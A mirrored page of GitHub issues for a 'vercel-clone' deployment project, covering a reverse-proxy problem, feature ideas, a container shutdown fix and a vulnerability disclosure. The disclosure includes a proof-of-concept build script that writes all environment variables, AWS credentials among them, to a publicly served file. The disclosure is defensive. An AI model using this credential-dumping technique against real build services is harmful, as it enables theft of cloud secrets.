Giter Club home page Giter Club logo

vercel-clone's Issues

Unable to access resource from S3 public server using reverse proxy

output

image

Code

const express = require("express");
const httpProxy = require("http-proxy");

const app = express();
const PORT = 8000;

const BASE_PATH =
    "https://faucet-client-deployments.s3.amazonaws.com/__outputs";

const proxy = httpProxy.createProxy();

app.use((req, res) => {
    const hostname = req.hostname;
    const subdomain = hostname.split(".")[0];

    // Custom Domain - DB Query

    const resolvesTo = `${BASE_PATH}/${subdomain}`;

    return proxy.web(req, res, { target: resolvesTo, changeOrigin: true });
});

proxy.on("proxyReq", (proxyReq, req, res) => {
    const url = req.url;
    console.log("url", url);
    console.log("proxyReq.path", proxyReq.path);
    if (url === "/") proxyReq.path += "index.html";
});

app.listen(PORT, () => console.log(`Reverse Proxy Running..${PORT}`));

S3 Bucket policy

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": [
                "s3:GetObject",
                "s3:GetObjectVersion"
            ],
            "Resource": "arn:aws:s3:::faucet-client-deployments/*"
        },
        {
            "Sid": "AllowWebAccess",
            "Effect": "Allow",
            "Principal": "*",
            "Action": [
                "s3:GetObject",
                "s3:GetObjectVersion"
            ],
            "Resource": "arn:aws:s3:::faucet-client-deployments/*"
        }
    ]
}

Not dynamic for all build

This project is completely for Vite Project. But as we all know that while building React projects, instead of dist folder we get build folder. This issue has to be resolved if anyone notices.

Feat: Deploy ECS Cluster Separately Using AWS CDK

I've been exploring the project and its deployment setup. After reviewing the infrastructure and considering the potential for scalability and modularity, I believe there's an opportunity to enhance the deployment process.

Proposal:
Instead of deploying the ECS cluster directly within the project setup, I suggest deploying it separately using AWS CDK. This approach would offer several benefits:

  • Improved scalability and flexibility: Decoupling the ECS cluster deployment allows for independent scaling and management.
  • Simplified updates: With the ECS cluster managed separately, updates to the task ARN or other configurations can be performed more seamlessly without affecting the main project deployment.
  • Better resource management: Separating the ECS cluster deployment enables more granular control over resources and configurations, optimizing performance and cost-effectiveness.

Steps:

  1. Utilize AWS CDK to define and deploy the ECS cluster infrastructure.
  2. Integrate the deployed ECS cluster with the main project setup by updating the necessary configurations (e.g., task ARN).
  3. Ensure seamless communication and interaction between the deployed ECS cluster and other project components.

New Features

Add custom CMDs
To install
To run
To build

Front-end or back-end code

Possibly to add support for server functions?

I'm trying to come up with ways to support server functions, and my thought is to use a tool like this
aws-lambda-web-adapter, or maybe even SST. My idea is to deploy a static build just like it's currently doing, but deploy the project to a lambda function as well and somehow (haven't figured it out yet) get the static build to understand that API routes and serverless functions are running else where.

Containers are still running

Problem : Containers are still running even after the build process completed
Solution : Need to add publisher.disconnect(); on line 70 in /build-server/script.js
This will ensure the docker shutdown after the upload process is completed. ๐Ÿ’ฏ

  • publisher.disconnect() will revoke the connection with redis server.

Vulnerability of arbitrary code execution due to Docker's build scripts

I wanted to point out the vulnerability which could compromise the docker container and thus, it could leak your AWS credentials. The issues arises from the fact that this project runs "npm run build" inside the docker container to build and upload any github repo. An attacker can call malicious script when "npm run build" is called to run any arbitrary code in the docker instance. This was needed to be pointed out because I found some people were hosting this project on the web with their AWS credentials. I was waiting for them to take down the live project before posting this issue.

While this project is good for education, it shouldn't be hosted on the web unless these compromises are taken care of. Since this project is used by many students, I am writing down the steps to show how easy it would be to compromise the docker instance. I believe, it would be a good learning opportunity as well to figure out on ways to solve this.

Details

  • The build server's script.js runs the build script which is defined in the package.json with npm run build.
  • Attacker can use a github repo with package.json to define the build script to call a malicious script.
{
  "name": "demo",
  "version": "1.0.0",
  "scripts": {
    "build": "node server.js"
  },
}
  • The malicious script server.js can be used to dump all the enviornment variable to a file which would be uploaded to S3.
const fs = require('fs');
const path = require('path');

// Define the output directory and file name
const outputDir = path.join(__dirname, 'dist');
const outputFile = path.join(outputDir, 'env.txt');

// Ensure the 'dist' directory exists
if (!fs.existsSync(outputDir)) {
  fs.mkdirSync(outputDir, { recursive: true });
}

// Get all environment variables
const envVariables = Object.entries(process.env)
  .map(([key, value]) => `${key}=${value}`)
  .join('\n');

// Write the environment variables to the file
fs.writeFile(outputFile, envVariables, (err) => {
  if (err) {
    console.error('Error writing to file:', err);
  } else {
    console.log(`Environment variables have been written to ${outputFile}`);
  }
});
  • env.txt would be accessable from the hosted url (subdomain.example.com/env.txt) with all the environment variables including the AWS creds since it was passed to the Docker instance for uploading repo files to S3.

Possible Solution:

While a lof of ways exist to solve this issue. One way would be to just use the docker container to build the files and upload the files to S3 outside of docker. This can be done using volume mount feature of Docker.

I tried to implement this solution while doing similar project after watching the @piyushgarg-dev vercel video. You can reference to my repo js-webhost for this.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.